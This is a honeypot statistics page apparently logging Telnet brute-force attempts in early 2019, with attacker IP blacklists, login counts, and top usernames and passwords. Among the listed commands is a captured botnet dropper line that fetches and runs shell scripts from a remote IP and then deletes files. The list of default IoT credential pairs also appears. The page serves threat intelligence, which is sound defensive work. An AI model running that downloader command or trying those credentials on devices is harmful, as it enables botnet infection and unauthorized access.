Honeypot Telnet

This page is updated daily. Last update: 2019-02-15 23:09:07 UTC

The followings Telnet blacklists (updated every day and in text format) contains IP addresses of hosts which tried to bruteforce into my honeypot located in Italy.
The honeypot simulates a home router with a weak password and the most usual commands.
Monthly Telnet login attempts

Attackers blacklists (IP address)

24 hours (txt)week (txt)year (txt)

Other informations

All passwords order by length (txt)
HTTP urls collected (txt)
Monthly connections (txt)

Statistics - 2019

Unique IP address315
Unique username85
Unique password295

Latest commands executed

Timestamp Command IP address AS AS Org Country
2019-01-05enable186.179.154.6127775Telecommunicationcompany ...SR
2019-01-05enable87.14.208.2243269ASN-IBSNAZ, ITIT
2019-01-05enable186.179.154.6127775Telecommunicationcompany ...SR
2019-01-05enable186.179.154.6127775Telecommunicationcompany ...SR
2019-01-05enable186.179.154.6127775Telecommunicationcompany ...SR
2019-01-05enable157.230.8.1214061DIGITALOCEAN-ASN DigitalOcean, LLC, USUNK
2019-01-05enable87.14.30.923269ASN-IBSNAZ, ITIT
2019-01-05enable186.179.167.11227775Telecommunicationcompany ...SR
2019-01-05enable74.93.73.1697922COMCAST-7922 Comcast Cabl...US
2019-01-05enable183.245.115.3656041CMNET-ZHEJIANG-AP China M...CN

Top most sessions per distinct IP address - 2019

IP Address AS AS Org Country
142.93.158.209 (virustotal) (dnsbl-check)14061DIGITALOCEAN-ASN DigitalOcean, LLC, USUNK
87.119.65.98 (virustotal) (dnsbl-check)47771ENTRY-BG-AS, BGBG
31.163.48.230 (virustotal) (dnsbl-check)12389ROSTELECOM-AS, RURU
178.46.0.56 (virustotal) (dnsbl-check)12389ROSTELECOM-AS, RURU
207.194.215.60 (virustotal) (dnsbl-check)25668CIPHERKEY Cipherkey Exchange Corp., CACA
60.5.169.67 (virustotal) (dnsbl-check)4837CHINA169-BACKBONE CHINA U...CN
81.230.96.43 (virustotal) (dnsbl-check)3301TELIANET-SWEDEN Telia Company, SESE
223.18.221.29 (virustotal) (dnsbl-check)9304HUTCHISON-AS-AP HGC Globa...HK
103.84.144.30 (virustotal) (dnsbl-check)55699STARNET-AS-ID PT. Cemerla...UNK
188.17.9.234 (virustotal) (dnsbl-check)12389ROSTELECOM-AS, RURU

Login attempts last 10 days

Date Occurrences
2019-01-051243
2019-01-042587
2019-01-032570
2019-01-021896
2019-01-012307
2018-12-312131
2018-12-302601
2018-12-291921
2018-12-281933
2018-12-272

Top username - 2019

Username
enable
shell
root
admin
sh
wlahh
default
guest
support
+

Top password - 2019

Password
system
sh
bah
linuxshell
admin
1111
default
12345
123456
password

Top username/password - 2019

Username / Password
enable / system
shell / sh
shell / bah
wlahh / linuxshell
admin / admin
root / vizxv
default / S2fGqNFs
guest / 12345
=&+""N / =&N
+ / ,"+N

Top most commands - 2019

Command
enable
enable
start
+ /,"+N
sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://142.93.18.16/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 142.93.18.16 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 142.93.18.16; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 142.93.18.16 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
shell

See also

Detux - multiplatform Linux Sandbox
IoT bad password sheet by krebsonsecurity.com
Leaked Mirai source code for research/IoC development purposes